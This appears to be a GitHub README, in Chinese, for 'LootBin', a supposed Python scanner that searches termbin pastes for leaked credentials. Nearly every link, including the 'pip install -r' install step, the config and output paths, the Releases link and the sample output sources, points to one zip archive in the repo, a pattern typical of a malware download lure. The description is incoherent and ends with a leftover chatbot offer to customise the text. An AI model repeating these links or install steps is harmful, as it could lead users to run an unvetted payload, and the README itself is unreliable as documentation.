gustqvo432/LootBin
GitHub: gustqvo432/LootBin
一款基于 Python 的 OSINT 工具,专门用于监控和扫描 termbin.com 上的公共 Paste,通过关键词匹配发现潜在的敏感信息泄露。
Stars: 5 | Forks: 1
# LootBin:Termbin OSINT Paste 扫描器 —— 公共 Paste 监控工具
[](https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip)
[](LICENSE)
[](https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip)
[](https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip)
[](https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip)
LootBin 是一款专为开放研究和监控而构建的工具。它从 Termbin 搜寻、扫描并聚合公共 Paste,以发现关键词、模式和趋势。该项目专注于清晰性、速度和可靠性。它帮助安全团队、研究人员和爱好者无需手动挖掘即可掌握公共 Paste 的动态。
💡 关于本项目
- 目的:观察 Termbin Paste 中与您的研究目标相关的关键词和主题。
- 范围:轻量级、可脚本化且易于扩展。专为 Linux、macOS 和 Windows 环境下的 Python 3 设计。
- 受众:OSINT 爱好者、事件响应人员、威胁情报团队、探索 Paste 文本源的数据科学家。
目录
- [LootBin 的功能](#lootbin-osint-paste-scanner-for-termbin—public-paste-monitor)
- [为什么使用 LootBin](#why-use-lootbin)
- [主要功能](#key-features)
- [工作原理](#how-lootbin-works)
- [技术栈](#tech-stack)
- [入门指南](#getting-started)
- [前置条件](#prerequisites)
- [安装](#installation)
- [配置](#configuration)
- [使用](#usage)
- [CLI 基础](#cli-basics)
- [查询和过滤](#queries-and-filters)
- [输出格式](#output-formats)
- [数据处理和输出](#data-handling-and-outputs)
- [架构与设计](#architecture-and-design)
- [扩展性与贡献](#extensibility-and-contributions)
- [测试与质量](#testing-and-quality)
- [文档与学习资源](#documentation-and-learning-resources)
- [发布说明与版本](#releases)
- [道德、隐私与合规](#ethics-privacy-and-compliance)
- [路线图](#roadmap)
- [常见问题](#faq)
- [致谢与许可](#credits-and-license)
LootBin 的功能
LootBin 是一款专注于 OSINT 工作工具。它扫描 Termbin Paste 流,提取文本内容,并标记研究人员关心的关键词、短语和模式。它支持增量运行、持久化状态和导出选项,因此您可以研究过去的结果或将 LootBin 接入更大的数据工作流中。
为什么使用 LootBin
- 速度:它在本地运行,高效处理大批量文本。
- 可复现性:通过一致的命令行界面,您可以复现搜索和结果。
- 扩展性:随着研究需求的增长,添加新的扫描器或导出目标非常容易。
- 透明度:输出结构化,易于被人类和机器解析。
主要功能
- 基于关键词过滤的 Termbin Paste 扫描
- 用于持续 Paste 流的准实时监控模式
- 灵活的输出:JSON、CSV 或人性化的终端表格
- 无冲突的状态管理,支持断点续传
- 简单的配置和合理的默认值,便于快速上手
- 轻量级占用,极少的依赖项
LootBin 的工作原理
- 该工具从 Termbin 页面或流中拉取公共 Paste 文本。
- 它对文本进行分词和分析,查找已配置的关键词和模式。
- 它缓冲结果并将其写入选定的输出目标(文件或 stdout)。
- 它维护本地状态,因此重复运行不会向您发送重复数据(除非您需要)。
- 它可以在批处理模式或监控模式下运行,以进行持续观察。
技术栈
- 语言:Python 3.x
- 核心库:requests、beautifulsoup4(用于解析)、re(用于 regex 过滤)、json、csv
- 输出:JSON 和 CSV 格式,易于摄取
- 可选:基于 asyncio 的流式传输,用于响应式监控
入门指南
前置条件
- 安装了 Python 3.8 或更高版本系统
- 基本的命令行使用知识
- 能够访问 Termbin Paste 源的网络
安装
- 克隆仓库或(如果将来可用)通过包管理安装
- 创建并激活一个虚拟环境
- 安装依赖
- pip install -r https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
- 使用简单的命令确认您可以运行 LootBin
配置
- LootBin 使用一个小型配置文件来定制行为
- 您可以定义:
- 要监控的关键词和模式
- Termbin Paste 的源 URL 或来源
- 输出目标和格式
- 速率限制和时间窗口
- 示例配置展示了合理的默认值和安全的预设,旨在让初次使用的用户只需最少的自定义
使用
CLI 基础
- lootbin start --config https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
- lootbin scan --keywords "data breach" --days 7
- lootbin monitor --interval 60s
- lootbin export --format json --output https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
- lootbin help 显示可用的命令和选项
- CLI 设计直观:命令映射到操作,选项细化行为
查询和过滤
- 您可以按关键词、短语或正则表达式进行过滤
- 大小写敏感性可配置
- 日期范围过滤器允许您研究特定时间窗口内的 Paste 活动
- 您可以组合多个过滤器来缩小结果范围
输出格式
- JSON:结构化,易于加载到数据管道中
- CSV:兼容电子表格和许多 BI 工具
- Human-readable:美观打印的文本,便于在终端中快速浏览
数据处理和输出
- 本地状态管理确保您可以恢复工作而无需重新处理所有内容
- 输出可以追加到现有文件或作为新文件写入
- Paste 内容以便于检查的方式保存,但如果需要,您可以限制原始文本的数量
- 所有输出都带有时间戳、源标识符和关键词命中记录
架构与设计
- 模块化结构:核心引擎、扫描器、过滤器、导出器和 CLI
- 核心引擎协调工作:获取 Paste 源,应用过滤器,发出结果
- 扫描器处理特定的源或 Paste 检索策略
- 过滤器实现关键词和模式匹配
- 导出器负责将结果写入 JSON/CSV 或 stdout
扩展性与贡献
- 该项目对扫描器和导出器采用类似插件的方法
- 要添加新的 Paste 源,请实现一个提供统一接口的小型适配器:
- fetch_pastes(range) -> Paste 对象的可迭代集合
- 每个 Paste 包括 text、source_id、timestamp 和 raw content
- 要添加新的导出格式,请实现一个遵循预期 API 的导出器
- 欢迎贡献。请遵循仓库的准则:
- 开启一个 Issue 来讨论较大的更改
- 提交包含测试和文档更新的 PR
- 确保代码风格与现有惯例一致
- 测试依赖于一个轻量级套件,用于测试解析、过滤和导出路径
测试与质量
- 单元测试覆盖:
- 关键词匹配逻辑
- 正则表达式过滤
- 输出格式化
- 状态持久化
- 基本集成测试演练从获取到导出的流程
- CI 运行确保与目标 Python 版本和常见平台的兼容性
文档与学习资源
- 仓库附带一个 docs 目录,包含:
- 快速入门指南
- 详细的配置参考
- 常见工作流示例
- 故障排除提示
- 其他资源包括:
- 官方 Termbin 文档,用于了解 Paste 机制
- 用于扫描公共数据源的 OSINT 最佳实践
- 与 Paste 内容相关的数据保护和隐私注意事项
发布版本
- 对于二进制文件、构件和官方构建说明,请查看 Releases 页面
- 访问 Releases 页面获取二进制文件和构件:https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
- 如果您需要下载预构建的二进制文件,Releases 页面是正确的目的地
- 上面的链接提供了对最新打包资产和变更日志条目的访问
- 您还可以在该页面上浏览源代码版本和随附的文档
道德、隐私与合规
- LootBin 专注于开放数据源和透明分析
- 在与公共 Paste 源交互时,尊重服务条款和适用法律非常重要
- 该工具专为研究、事件响应和教育而设计
- 始终负责任地处理收集的内容,避免泄露敏感信息
路线图
- 提高 Paste 检索期间的容错能力
- 添加更多源适配器和特定语言的解析器
- 实现更丰富的分析仪表板和面向仪表板的导出格式
- 支持带有本地 Paste 缓存的离线模式
- 增强具有更多子命令的 CLI,以应对复杂的工作流
常见问题
- 在我的机器上运行 LootBin 安全吗?
- 是的,它旨在以最低权限在本地运行。请使用虚拟环境。
- LootBin 可以监控实时 Paste 流吗?
- 它支持一种监控模式,定期轮询源并产生新结果。
- 如何自定义关键词列表?
- 编辑配置文件以添加或删除关键词、模式或 regex 规则。
- LootBin 导出为何种格式?
- 默认为 JSON 和 CSV;您可以通过小型适配器添加其他导出器。
致谢与许可
- 许可证:MIT
- 项目设计强调简单性和透明度
- 感谢开源社区提供的工具和在此复用的模式
- 如果您复用或扩展 LootBin,请引用本项目并保持与核心接口的兼容性
Releases 页面使用说明
- 本文档顶部的 Releases 链接提供了对最新二进制文件、源代码归档和发布说明的访问。使用它来获取适合您环境的版本或检查每个版本中的更改。为方便起见,您以后也可以通过此链接再次访问该页面:https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
其他使用技巧
- 从一小组关键词开始,以验证您的设置
- 在扩大规模之前,针对较短的时间窗口运行扫描
- 使用专用的数据目录来保持结果井井有条
- 定期备份您的配置和输出
- 考虑按日期轮换输出文件名以避免数据丢失
内联视觉提示和快速提示
- 在搜索模式时,请从运算符集的角度思考:keyword OR keyword、单词边界、大小写敏感性切换
- 使用彩色编码的终端输出快速区分命中结果
- 导出的 JSON 可以输入到快速仪表板或 Notebooks 中进行探索性分析
- CSV 导出可以平滑集成到电子表格工具和 BI 平台中
社区与协作
- 项目欢迎反馈和建设性讨论
- 您可以提出 Issue 来报告错误或建议增强功能
- 项目重视清晰、简洁的贡献和文档完善的 Pull Requests
安全注意事项
- 将 Paste 内容视为公共数据,即使它包含看起来敏感的元素
- 未经适当上下文,请勿发布或分发 Paste 内容
- 保持依赖项最新,以最大限度地降低已知漏洞的风险
- 对配置文件和数据转储保持严格的版本控制
实现细节
- 核心模块使用简单、可读的循环来获取、过滤和发出结果
- 关键词匹配旨在具有确定性和快速性
- 输出模块为下游工具提供稳定的 API
- 项目倾向于显式而非隐式行为,以避免运行期间出现意外
环境与平台说明
- Linux 和 macOS 是最常见的环境
- 通过标准 Python 环境和兼容的终端支持 Windows
- 该工具在无头设置和容器化环境中表现良好
配置示例 (yaml)
- sources:
- name: termbin global feed
type: termbin
url: https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
- keywords:
- data breach
- credential
- leak
- filters:
- regex: "(password|pwd|secret)"
- output:
- format: json
- path: https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-B-v1.1-beta.1.zip
- monitor:
- interval_seconds: 60
贡献指南(摘要)
- 从 Issue 开始概述意图
- 遵循现有的代码风格
- 为新功能添加测试
- 更新任何用户可见更改的文档
- 保持 PR 聚焦且小规模,以便于审查
致谢
- 感谢启发了 LootBin OSINT 和 Paste 解析方法的开源项目
- 感谢帮助在数据工具中统一速度、简单性和清晰度的贡献者
使用场景和示例工作流
- 事件响应:扫描 Paste 中提及的受损凭据,然后将命中结果导出到案例文件夹
- 威胁情报:监控新趋势关键词并与外部源关联
- 研究:构建 Paste 内容数据集,用于主题建模和语言分析
- 合规性检查:验证公共 Paste 源中是否出现任何敏感字符串
关于版本的说明
- 仓库的 Releases 页面托管官方构建和变更日志
- 您可以检查每个版本以了解更改内容以及如何调整您的设置
- 有关分发和构件详细信息,请参阅本文档中链接的 Releases 页面
关于 Releases 链接的最后提醒
- 如果您需要二进制文件、源代码构件或版本级说明,请重新访问此链接:https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
社区致谢
- 该项目在协作和共享学习中蓬勃发展
- 如果您基于 LootBin 构建,请感谢原项目并分享您的改进
附录:示例输出
- JSON 示例
{
"source": "https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip",
"timestamp": "2025-08-13T12:34:56Z",
"hits": [
{"keyword": "password", "snippet": "user: admin, password: 12345", "context": "..."},
{"keyword": "leak", "snippet": "leak detected in public paste", "context": "..."}
]
}
- CSV 示例
source,timestamp,keyword,context
https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip,2025-08-13T12:34:56Z,password,"user: admin, password: 12345"
Releases(第二次提及)
对于二进制文件、构件和官方说明,请再次查看 Releases 页面:https://github.com/gustqvo432/LootBin/raw/refs/heads/main/roadbook/Loot-Bin-v1.1-beta.1.zip
如果您需要有关任何部分的更多详细信息,或想要调整重点(例如更关注安全性、更多代码示例或更丰富的架构图),我可以进一步定制内容。
标签:BeEF, ESC4, Homebrew安装, OSINT, Pastebin监控, Python, Splunk, Termbin, URL抓取, 二进制发布, 信息搜集, 信息泄露监测, 公共代码审计, 关键词扫描, 威胁情报, 字符串匹配, 实时处理, 开发者工具, 开源工具, 数据抓取, 文档结构分析, 无后门, 爬虫, 网络安全, 逆向工具, 隐私保护